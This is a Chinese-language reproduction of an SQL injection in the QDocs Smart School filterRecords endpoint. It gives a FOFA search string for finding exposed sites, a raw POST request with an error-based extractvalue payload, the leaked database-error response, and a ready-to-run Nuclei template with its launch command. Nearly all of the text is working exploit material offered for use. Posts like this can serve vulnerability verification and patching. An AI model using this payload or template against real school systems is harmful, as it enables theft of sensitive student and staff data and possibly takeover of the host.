QDocs Smart School SQL注入漏洞复现 (付nuclei poc)

body="close closebtnmodal"

POST /course/filterRecords/ HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Connection: closeContent-Length: 224Accept: */*Accept-Language: enContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzipsearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

HTTP/1.1 500 Internal Server ErrorConnection: closeTransfer-Encoding: chunkedCache-Control: no-store, no-cache, must-revalidateContent-Type: text/html; charset=UTF-8Date: Tue, 14 Nov 2023 02:21:35 GMTExpires: Thu, 19 Nov 1981 08:52:00 GMTPragma: no-cacheServer: ApacheSet-Cookie: ci_session=0fbd043af961fa6feb7ba1a8b5c5a3b2c0cff392; expires=Tue, 14-Nov-2023 04:21:35 GMT; Max-Age=7200; path=/; HttpOnlyUpgrade: h2,h2cVary: Accept-EncodingX-Powered-By: PHP/7.4.33<!DOCTYPE html><html lang="en">    <head>        <meta charset="utf-8">        <title>Database Error</title>        <style type="text/css">            ::selection { background-color: #E13300; color: white; }            ::-moz-selection { background-color: #E13300; color: white; }            body {                background-color: #fff;                margin: 40px;                font: 13px/20px normal Helvetica, Arial, sans-serif;                color: #4F5155;            }            a {                color: #003399;                background-color: transparent;                font-weight: normal;            }            h1 {                color: #444;                background-color: transparent;                border-bottom: 1px solid #D0D0D0;                font-size: 19px;                font-weight: normal;                margin: 0 0 14px 0;                padding: 14px 15px 10px 15px;            }            code {                font-family: Consolas, Monaco, Courier New, Courier, monospace;                font-size: 12px;                background-color: #f9f9f9;                border: 1px solid #D0D0D0;                color: #002166;                display: block;                margin: 14px 0 14px 0;                padding: 12px 10px 12px 10px;            }            #container {                margin: 10px;                border: 1px solid #D0D0D0;                box-shadow: 0 0 8px #D0D0D0;            }            p {                margin: 12px 15px 12px 15px;            }</style>    </head>    <body>        <div id="container">            <h1>A Database Error Occurred</h1>            <p>Error Number: 1105</p><p>XPATH syntax error: '^e10adc3949ba59abbe56e057f20f883'</p><p>SELECT `online_courses`.*, `course_category`.`category_name`        FROM `online_courses`LEFT JOIN `course_category` ON `course_category`.`id` = `online_courses`.`category_id`WHERE 1 = 1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))# '1'AND `online_courses`.`front_side_visibility` = 'yes'AND `online_courses`.`status` = 1</p><p>Filename: models/Course_model.php</p><p>Line Number: 708</p>        </div>    </body></html>

id: smart-school-filterRecords-sqliinfo:  name: QDocs Smart School SQL注入漏洞  author: fgz  severity: high  description: 'QDocs Smart School是一套智慧校园管理系统。Smart School 6.4.1系统filterRecords接口存在sql注入漏洞，攻击者可获取数据库敏感数据，甚至执行命令,进而有可能导致主机被远控。'  tags: 2023,smart-school,sqli  metadata:    max-request: 3    fofa-query: body="close closebtnmodal"    verified: truehttp:  - method: POST    path:      - "{{BaseURL}}/course/filterRecords/"    headers:      Content-Type: application/x-www-form-urlencoded    body: "searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1"    matchers:      - type: dsl        dsl:          - "status_code_1 == 500 && contains(body,'e10adc3949ba59abbe56e057f20f883')"

nuclei.exe -t mypoc/其他/smart-school-filterRecords-sqli.yaml -u http://192.168.86.128:8990